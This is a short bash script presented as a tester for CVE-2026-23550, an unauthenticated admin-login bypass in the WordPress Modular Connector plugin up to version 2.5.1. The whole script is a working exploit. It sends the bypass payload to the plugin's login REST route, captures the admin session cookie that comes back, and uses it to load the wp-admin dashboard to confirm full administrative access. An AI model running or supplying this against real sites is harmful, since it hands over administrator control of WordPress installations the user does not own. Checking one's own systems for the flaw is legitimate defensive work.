#!/bin/bash
TARGET="${1:-http://localhost:8080}"
COOKIE_JAR="cookies.txt"

echo "[+] CVE-2026-23550 Modular Connector Admin Bypass Tester"
echo "[+] Target: $TARGET (Modular Connector <=2.5.1)"
echo

# Exploit unauthenticated admin login
echo "[+] Sending origin=mo bypass payload..."
RESPONSE=$(curl -s -w "\nHTTP:%{http_code}" -X POST \
  "$TARGET/?rest_route=/api/modular-connector/login" \
  -H "Content-Type: application/json" \
  -d '{"origin":"mo"}' \
  -c "$COOKIE_JAR")

HTTP_CODE=$(echo "$RESPONSE" | tail -1 | cut -d: -f2)
echo "[+] HTTP: $HTTP_CODE"

# Check for admin session cookie
if grep -q "wordpress_logged_in_" "$COOKIE_JAR"; then
  echo "[+] ✅ VULNERABLE! Admin session cookie issued"
  echo "[+] Cookies saved: $COOKIE_JAR"
  
  # Verify wp-admin access
  echo "[+] Testing wp-admin access..."
  DASHBOARD=$(curl -s -b "$COOKIE_JAR" "$TARGET/wp-admin/" | grep -i "dashboard\|wp-admin")
  if [[ -n "$DASHBOARD" ]]; then
    echo "[+] ✅ FULL ADMIN ACCESS CONFIRMED"
    echo "    $DASHBOARD" | head -1
  fi
else
  echo "[-] Not vulnerable - no admin cookie issued"
fi

rm -f "$COOKIE_JAR"
echo "[+] Test complete"
